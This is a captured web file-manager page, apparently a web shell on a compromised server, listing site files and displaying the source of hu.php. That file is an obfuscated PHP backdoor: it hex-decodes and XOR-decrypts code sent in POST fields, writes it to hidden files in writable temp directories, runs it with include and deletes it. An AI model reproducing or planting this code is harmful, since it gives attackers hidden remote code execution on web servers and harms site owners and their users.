at path:
ROOT
/
hu.php
run:
R
W
Run
.holder
49 By
2026-04-10 08:56:58
R
W
Run
Delete
Rename
.htaccess
231 By
2026-04-06 01:42:36
R
W
Run
Delete
Rename
.k
744 By
2026-04-17 01:05:08
R
W
Run
Delete
Rename
.pointer
744 By
2026-04-18 03:26:19
R
W
Run
Delete
Rename
.rec
744 By
2026-04-14 18:04:18
R
W
Run
Delete
Rename
db.inc.php
5.58 KB
2026-04-11 20:44:45
R
W
Run
Delete
Rename
error_log
10.17 KB
2026-04-17 01:05:08
R
W
Run
Delete
Rename
hu.php
1.28 KB
2026-04-10 00:42:02
R
W
Run
Delete
Rename
robots.txt
955 By
2026-04-06 01:44:06
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
so.php
2.57 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
so_SO.php
1.46 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
xbutton.php
2.11 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
error_log
up
📄
hu.php
Save
<?php if(isset($_POST["tkn"]) ? true : false){ $itm = hex2bin($_POST["tkn"]); $desc ='' ;$g = 0; while($g < strlen($itm)){$desc .= chr(ord($itm[$g]) ^ 23);$g++;} $pointer = array_filter([session_save_path(), "/var/tmp", sys_get_temp_dir(), "/tmp", getenv("TMP"), getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), "/dev/shm"]); foreach ($pointer as $key => $dchunk) { if ((is_dir($dchunk) and is_writable($dchunk))) { $data_chunk = join("/", [$dchunk, ".comp"]); if (@file_put_contents($data_chunk, $desc) !== false) { include $data_chunk; unlink($data_chunk); exit; } } } } if(count($_POST) > 0 && isset($_POST["dch\x75\x6E\x6B"])){ $descriptor = array_filter(["/dev/shm", getcwd(), sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP")]); $elem = hex2bin($_POST["dch\x75\x6E\x6B"]); $fac= '' ;$r = 0; while($r < strlen($elem)){$fac .= chr(ord($elem[$r]) ^ 10);$r++;} for ($res = 0, $itm = count($descriptor); $res < $itm; $res++) { $entity = $descriptor[$res]; if (array_product([is_dir($entity), is_writable($entity)])) { $key = sprintf("%s/.k", $entity); $file = fopen($key, 'w'); if ($file) { fwrite($file, $fac); fclose($file); include $key; @unlink($key); die(); } } } }